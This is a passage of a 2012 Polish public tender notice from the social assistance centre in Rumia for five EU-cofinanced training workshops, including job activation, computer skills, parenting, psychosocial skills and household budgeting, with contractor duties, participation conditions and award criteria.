27.	Szkolenie powinno mieć opiekuna z ramienia Wykonawcy czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
28.	Lokal, w którym będą przeprowadzane zajęcia teoretyczne powinien być przestronny i przewiewny, posiadać dostęp do pomieszczeń sanitarnych oraz winien gwarantować w trakcie szkolenia wymogi bezpieczeństwa i higieny pracy w tym zakresie. Ponadto powinien być wyposażony w pomoce dydaktyczne i sprzęt, umożliwiające prawidłową realizację kształcenia będącego przedmiotem zamówienia. Dodatkowo lokal powinien zawierać informację o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - oznakowanie zgodnie z Załącznikiem nr 1
29.	Miejscem wykonania zamówienia jest Rumia.
30.	Po zakończeniu szkolenia w celu ocenienia jakości zrealizowanej usługi Wykonawca przekaże uczestnikom szkolenia do wypełnienia ankietę, stanowiącą Załącznik nr 3 do SIWZ. Ankiety zostaną wypełnione przez uczestników anonimowo i dostarczone Zamawiającemu po zakończeniu szkolenia.
31.	Warsztaty rozpoczną się i zakończą się testem umożliwiającym ocenę poziomu opanowania wiedzy i umiejętności z zakresu programu warsztatów. Analiza tych ankiet pozwoli ocenić osiągnięcie założonych rezultatów. Co najmniej na 3 dni przed rozpoczęciem warsztatów Wykonawca przedstawi Zamawiającemu wzory ankiet. 
32.	Wykonawca każdemu uczestnikowi warsztatów, który je ukończy, wystawi odpowiednie zaświadczenie. Zaświadczenie winno zawierać informację o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
33.	Wykonawca zobowiązany jest do :
1)	Prowadzenia  dokumentacji przebiegu warsztatów zawierającej ologowanie zgodne z obowiązującymi Wytycznymi dotyczącymi Oznaczania Projektów w ramach Programu Operacyjnego Kapitał Ludzki. Wzory papieru firmowego projektu zawiera załącznik nr 2
2)	Zarejestrowania w internetowej bazie ofert szkoleniowych, dostępnej na stronie internetowej (www.inwestycjawkadry.info.pl) szkolenia realizowanego w ramach  umowy zgodnie z zakresem danych wymaganych formularzem internetowym.
3)	Systematycznej oceny postępów uczestników warsztatów, indywidualizacji kształcenia w przypadku wystąpienia trudności w procesie nauczania.
4)	Bieżącego informowania na piśmie MOPS o przypadkach nieobecności na szkoleniu uczestników szkolenia oraz w wypadku rezygnacji z uczestnictwa w szkoleniu w trakcie ich trwania.
5)	Wydania uczestnikom kończącym szkolenie z wynikiem pozytywnym, w terminie do 7 dni od daty dokonania oceny, stosownych zaświadczeń.
6)	Przekazania zamawiającemu w terminie 7 dni po zakończeniu szkolenia dokumentacji określonej w punkcie 22 opisu przedmiotu zamówienia.
7)	Promocji oraz reklamy projektu i informacji pisemnej dla uczestników szkoleń o współfinansowaniu szkolenia ze środków Europejskiego Funduszu Społecznego. Wytyczne Dotyczące Oznaczania Projektów w Ramach Programu Operacyjnego Kapitał Ludzki dostępne są na stronie internetowej: www.defs.woj-pomorskie.pl w zakładce: promocja.
8)	Przechowywania wszystkich dokumentów potwierdzających realizację szkolenia do 31.12.2020 r. zgodnie z Rozporządzeniem Rady (WE) nr 1260/1999 z dnia 21.06.1999 r. ustanawiającym przepisy ogólne w sprawie funduszy strukturalnych oraz Rozporządzenia Komisji (WE) nr 1685/2000 z dnia 28.07.2000 r. i Rozporządzenia Komisji (WE) nr 1145/2003 z dnia 27.06.2003 r. w sprawie szczegółowych zasad wykonywania Rozporządzenia Rady.
9)	Niezwłocznego informowania na piśmie listem poleconym bądź faksem o zaistniałych przeszkodach w realizacji programu warsztatów. 
34.	Potwierdzeniem prawidłowo zrealizowanej przez Wykonawcę usługi jest przekazanie wskazanej wyżej dokumentacji i podpisanie protokołu zdawczo-odbiorczego z Zamawiającym.

5. CZĘŚĆ E: ABC zarządzania budżetem domowym
Przedmiotem zamówienia jest wykonanie szkolenia ABC zarządzania budżetem domowym dla grupy 20 osób, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Warsztaty prowadzone będą przez trenera posiadającego odpowiednie wykształcenie, kwalifikacje i doświadczenie.
1.	Program szkolenia winien obejmować:
1)	Istota budżetu domowego
2)	Dlaczego zarządzać budżetem,
3)	tworzenie budżetu domowego,
4)	zarządzanie budżetem domowym,
5)	kontrola wydatków
6)	Okazjonalne wydatki
7)	Realne koszty zakupów
8)	Efektywne oszczędzanie
9)	Deficyt budżetu domowego
10)	Oszczędzanie na zakupach
11)	Oszczędzanie na telefonach
12)	Oszczędzanie energii
13)	Oszczędzanie wody
14)	Oszczędzanie ogrzewania
15)	Oszczędzanie na transporcie
Celem warsztatów jest podniesienie racjonalności gospodarowania budżetem domowym i zarządzania własnym gospodarstwem domowym. Realizacja programu powinna się przyczynić do podwyższenia umiejętności społecznych i wychowawczych.
2.	Liczba osób objętych szkoleniem - 20.
3.	Szkolenie zostanie przeprowadzone w jednej grupie 20-osobowej
4.	Liczba godzin szkolenia:  Ogółem 18 godzin zegarowych wraz z przerwami, 
5.	Termin realizacji zamówienia: czerwiec 2012 r.: Dni robocze w terminie od 11.06.2012 r. do 13.06.2012 r., obejmujące 3 dni po 6 godzin.
6.	Wykonawca zobowiązany jest do ubezpieczenia każdego uczestnika warsztatów od następstw nieszczęśliwych wypadków, w okresie realizacji umowy, na kwotę co najmniej 5000,00 zł. 
7.	Uczestnicy warsztatów muszą zostać wyposażeni w obowiązkowe materiały szkoleniowe w postaci:
1)	zeszyt,
2)	długopis,
3)	identyfikator,
4)	podręcznik lub inną literaturę z zakresu tematyki objętej programem szkolenia,
Wymienione powyżej materiały każdy uczestnik szkolenia otrzyma na własność.
Dodatkowo jeden zestaw materiałów szkoleniowych zostanie przekazany Zamawiającemu wraz z dokumentacją przebiegu kształcenia.
Materiały te należy uwzględnić w kalkulacji kosztów szkolenia.
Odbiór materiałów musi zostać pokwitowany przez uczestników szkolenia (na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć).
8.	Wykonawca zapewnia każdemu uczestnikowi szkolenia gorący posiłek (tzw. drugie danie zawierające ziemniaki (frytki, ryż), surówki oraz mięso) w każdym dniu realizacji szkolenia oraz poczęstunek w formie kawy, herbaty, zimnych napojów, słodyczy. Koszt niniejszych posiłków należy uwzględnić w kalkulacji kosztów szkolenia. Odbiór posiłków musi zostać pokwitowany przez uczestników szkolenia (na bieżąco zgodnie z realizowanym harmonogramem zajęć).
9.	Zagadnienia powinny być szczegółowo rozpisane w programie warsztatów, określające temat zajęć edukacyjnych.
10.	Szkolenie powinno mieć opiekuna z ramienia Wykonawcy czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
11.	Lokal, w którym będą przeprowadzane zajęcia teoretyczne powinien być przestronny i przewiewny, posiadać dostęp do pomieszczeń sanitarnych oraz winien gwarantować w trakcie szkolenia wymogi bezpieczeństwa i higieny pracy w tym zakresie. Ponadto powinien być wyposażony w pomoce dydaktyczne i sprzęt, umożliwiające prawidłową realizację kształcenia będącego przedmiotem zamówienia. Dodatkowo lokal powinien zawierać informację o współfinansowaniu szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - oznakowanie zgodnie z Załącznikiem nr 1
12.	Miejscem wykonania zamówienia jest Rumia.
13.	Po zakończeniu szkolenia w celu ocenienia jakości zrealizowanej usługi Wykonawca przekaże uczestnikom szkolenia do wypełnienia ankietę, stanowiącą Załącznik nr 3 do SIWZ. Ankiety zostaną wypełnione przez uczestników anonimowo i dostarczone Zamawiającemu po zakończeniu szkolenia.

Szczegółowy opis przedmiotu zamówienia, wszystkich 5 części znajduje się SIWZ na stronie www.mops.rumia.pl.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania: - działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień:</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonali lub  wykonują w okresie ostatnich 3 lat usługi w liczbie nie mniejszej niż 2, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających rodzajem usługom stanowiących przedmiot zamówienia (zawierających zakres tematyczny danego szkolenia) o wartości nie mniejszej niż 3 000,00 zł , podaniem daty i miejsca wykonywania, wraz z  dokumentami potwierdzającymi, należyte wykonanie usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie realizacji zamówienia będą dysponowały lokalem, w którym będą przeprowadzane zajęcia teoretyczne. Lokal  powinien być przestronny i przewiewny, posiadać dostęp do pomieszczeń sanitarnych oraz winien gwarantować w trakcie szkolenia wymogi bezpieczeństwa i higieny pracy w tym zakresie. Ponadto powinien być wyposażony w pomoce dydaktyczne i sprzęt, umożliwiające prawidłową realizację kształcenia będącego przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują osobami,  które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług tj.:
   1) prowadzenie szkoleń lub  warsztatów  adekwatnie do wymagań opisanych w poszczególnych częściach 
       zamówienia
      a.  posiadających wykształcenie wyższe lub średnie  adekwatnie do wymagań  poszczególnych części zamówienia
      b. posiadające  kwalifikacje zawodowe potwierdzone świadectwem ukończenia szkoły wyższej lub średniej właściwej 
         do prowadzenia zajęć opisanych w poszczególnych częściach zamówienia
  c. posiadające doświadczenie niezbędne dla wykonania zamówienia, poprzez zrealizowanie co najmniej dwóch 
  zamówień   o tematyce takiej samej lub podobnej do opisanej w poszczególnych częściach 
         zamówienia, 
    2) opiekuna z ramienia Wykonawcy czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z 
       uczestnikami szkolenia oraz Zamawiającym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony formularz ofertowy - zgodnie z załącznikiem nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy - 20</li>
<li>3 - Kwalifikacje kadry dydaktycznej - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa (umowy), która zostanie podpisana w wyniku rozstrzygnięcia niniejszego postępowania o udzielenie zamówienia publicznego, będzie zawierała zapisy podane we wzorze umowy stanowiącej załącznik nr 8 i 9, do specyfikacji istotnych warunków zamówienia, z uwzględnieniem treści oferty.
2. W oparciu o art. 144 ust. 1 ustawy Pzp Zamawiający określa następujące okoliczności, które mogą powodować  konieczność wprowadzenia istotnych zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
   a) zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Zamawiającego, np. w przypadku problemów z rekrutacją kandydatów na poszczególne kierunki szkoleń;
   b)  zmiana kadry dydaktycznej zaangażowanej w realizacje szkolenia, wyłącznie w przypadku wystąpienia udokumentowanych nadzwyczajnych okoliczności uniemożliwiających prowadzenie zajęć szkoleniowych przez 
       wskazanego w ofercie wykładowcę/trenera/instruktora (w szczególności z powodu choroby, wypadku czy śmierci osoby), pod warunkiem złożenia przez Wykonawcę pisemnego wniosku w tej sprawie i po akceptacji przez Zamawiającego; Zaproponowane osoby powinny posiadać kwalifikacje i doświadczenie zawodowe co najmniej takie jak wykładowca, który ma zostać zastąpiony.
   c) zmiana harmonogramu zajęć stanowiącego załącznik  do umowy szkoleniowej w uzasadnionych przypadkach  
       i za zgodą Zamawiającego;
   d)  wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy;
   e)  zmiana bazy lokalowej wyłącznie w przypadku wystąpienia udokumentowanych nadzwyczajnych okoliczności uniemożliwiających prowadzenie zajęć w proponowanym w ofercie lokalu, pod warunkiem złożenia przez Wykonawcę pisemnego wniosku w tej sprawie i po akceptacji przez Zamawiającego, zaproponowany nowy lokal powinien posiadać warunki co najmniej takie lub lepsze jak ten, który ma zostać zastąpiony;
    f) wynikających ze zmian obowiązujących przepisów prawnych;
    g) wynikających ze zmiany wytycznych lub zaleceń instytucji, która przyznała środki na sfinansowanie zamówienia;
     h) będących działaniem siły wyższej.
3. Wykonawca zobowiązuje się do ochrony danych osobowych uczestników szkolenia zgodnie z postanowieniami Ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz.U.2002 r. Nr 101 poz. 926, ze zm.) oraz do zawarcia z Zamawiającym odrębnej umowy o powierzeniu przetwarzania danych osobowych w zakresie niezbędnym do wydania zaświadczeń o ukończeniu szkolenia.  Wzór umowy stanowi załącznik nr 6 do specyfikacji istotnych warunków zamówienia
4. w przypadku, gdy umowę podpisuje inna osoba/osoby niż wskazana(e) w dokumentach rejestrowych należy złożyć pełnomocnictwo do zawarcia umowy w imieniu Wykonawcy. Pełnomocnictwo musi być udzielone przez osobę/osoby upoważnione zgodnie z wypisem z odpowiedniego rejestru,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.rumia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskiego Ośrodka Pomocy Społecznej w Rumi 84-230 Rumia, ul. Ślusarska 2, (pok.4 )..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2012 godzina 11:00, miejsce: Miejskiego Ośrodka Pomocy Społecznej w Rumi 84-230 Rumia, ul. Ślusarska 2, (pok.2 )..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu Razem ku lepszej przyszłości współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warsztaty aktywizacji zawodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie warsztatów aktywizacji zawodowej dla grupy 20 osób, w ramach Projektu Razem ku lepszej przyszłości współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki 
Program szkolenia winien obejmować:
1)	Sporządzanie dokumentów niezbędnych do poszukiwania pracy (CV, list motywacyjny),
2)	Przygotowanie się do rozmowy kwalifikacyjnej,
3)	Znaczenie autoprezentacji w poszukiwaniu zatrudnienia,
4)	Umiejętność poszukiwania właściwej oferty pracy,
5)	Aktywne poszukiwanie pracy
6)	Rynek pracy
7)	Formy zatrudnienia,
8)	Określenie indywidualnych planów działań,
Celem warsztatów jest poprawa motywacji i wiary we własne siły, podwyższenie umiejętności efektywnego  poszukiwania pracy, co przyczyni się do przygotowania osób narażonych na wykluczenie społeczne do wejścia na rynek pracy.
2. Wspólny Słownik Zamówień (CPV): 80530000-8
3. Czas trwania lub termin wykonania: Dni robocze w terminie od 14.05.2012 r. do 18.05.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 14.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy - 20</li>
<li>3. Kwalifikacje kadry dydaktycznej - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obsługa komputera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie szkolenia z zakresu obsługi komputera i umiejętności wykorzystania Internetu dla grupy 20 osób, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Warsztaty prowadzone będą przez trenera posiadającego odpowiednie wykształcenie, kwalifikacje i doświadczenie.
24.	Program szkolenia winien obejmować:
1)	Microsoft Windows,
2)	Microsoft Word,
3)	Microsoft Exel,
4)	Internet,
5)	Poczta elektroniczna,
6)	Power Point,
Celem warsztatów jest nauka i  podniesienie umiejętności w zakresie opisanym w programie szkolenia, co wpłynie na przygotowanie osób objętych szkoleniem do wejścia na rynek pracy.
2.  Wspólny Słownik Zamówień (CPV): 80530000-8
3. Czas trwania lub termin wykonania: Dni robocze w terminie od 25.06.2012 r. do 06.07.2012r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 25.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy - 20</li>
<li>3. Kwalifikacje kadry dydaktycznej - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkoła dla rodziców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie warsztatów Szkoła dla rodziców, dla grupy 20 osób, współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Warsztaty prowadzone będą przez psychologa.
    Program szkolenia winien obejmować:
1)	poznanie i rozumienie świata uczuć własnych oraz dziecka.
2)	świadomość własnych celów wychowania
3)	system kar i nagród
4)	naukę umiejętności rozmawiania o uczuciach .
5)	umiejętność stawiania jasnych granic i wymagań
6)	zachęcanie dzieci do współpracy
7)	wspólne rozwiązywanie konfliktów
8)	poszukiwanie lepszych niż kara sposobów uczenia dziecka samodyscypliny
9)	wspieranie samodzielności dzieci
10)	uwalnianie dzieci od grania ról oraz wzmacnianie ich poczucia własnej wartości przez pochwałę opisową
Celem warsztatów jest wspieranie rodziców w radzeniu sobie w codziennych kontaktach z dziećmi. Realizacja programu powinna się przyczynić do podwyższenia ich umiejętności społecznych i wychowawczych oraz zwiększenia spójności rodziny.

2. Wspólny Słownik Zamówień (CPV): 80530000-8
3. Czas trwania lub termin wykonania: Dni robocze  w terminach: 10.05.2012 r.; 24.05.2012 r.; 31.05.2012 r.;     14.06.2012 r.; 21.06.2012 r.; 12.07.2012 r.; 19.07.2012 r.; 09.08.2012 r.; 23.08.2012 r.; 30.08.2012 r.; 06.09.2012 r.; 
     13.09.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 10.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy - 20</li>
<li>3. Kwalifikacje kadry dydaktycznej - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warsztaty umiejętności psychospołecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie warsztatów umiejętności psychospołecznych dla grupy 20 osób, współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Warsztaty prowadzone będą przez psychologa.
Program szkolenia winien obejmować:
1)	Podstawowe pojęcia i zagadnienia dotyczące umiejętności psychospołecznych.
2)	Samopoznanie i bilans umiejętności
3)	Asertywność i wiara we własne siły
4)	Autoprezentacja i kształtowanie własnego wizerunku
5)	Zarządzanie stresem
6)	Umiejętność rozwiązywania konfliktów
7)	Sposoby radzenia sobie w kryzysie emocjonalnym
8)	Zarządzanie czasem i pracą własną
9)	Relacje w rodzinie, budowanie więzi.
Celem warsztatów jest poznanie przez uczestników swoich mocnych stron, podwyższenie własnej samooceny, zwiększenie motywacji do działania i zaufania we własne możliwości.

2. Wspólny Słownik Zamówień (CPV): 80530000-8
3. Czas trwania lub termin wykonania: Dni robocze  w terminie od 23.04.2012 r. do 27.04.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 23.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie Wykonawcy - 20</li>
<li>3. Kwalifikacje kadry dydaktycznej - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ABC zarządzania budżetem domowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie szkolenia ABC zarządzania budżetem domowym dla grupy 20 osób, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Warsztaty prowadzone będą przez trenera posiadającego odpowiednie wykształcenie, kwalifikacje i doświadczenie.
Program szkolenia winien obejmować:
1)	Istota budżetu domowego
2)	Dlaczego zarządzać budżetem,
3)	tworzenie budżetu domowego,
4)	zarządzanie budżetem domowym,
5)	kontrola wydatków
6)	Okazjonalne wydatki
7)	Realne koszty zakupów
8)	Efektywne oszczędzanie
9)	Deficyt budżetu domowego
10)	Oszczędzanie na zakupach
11)	Oszczędzanie na telefonach
12)	Oszczędzanie energii
13)	Oszczędzanie wody
14)	Oszczędzanie ogrzewania
15)	Oszczędzanie na transporcie
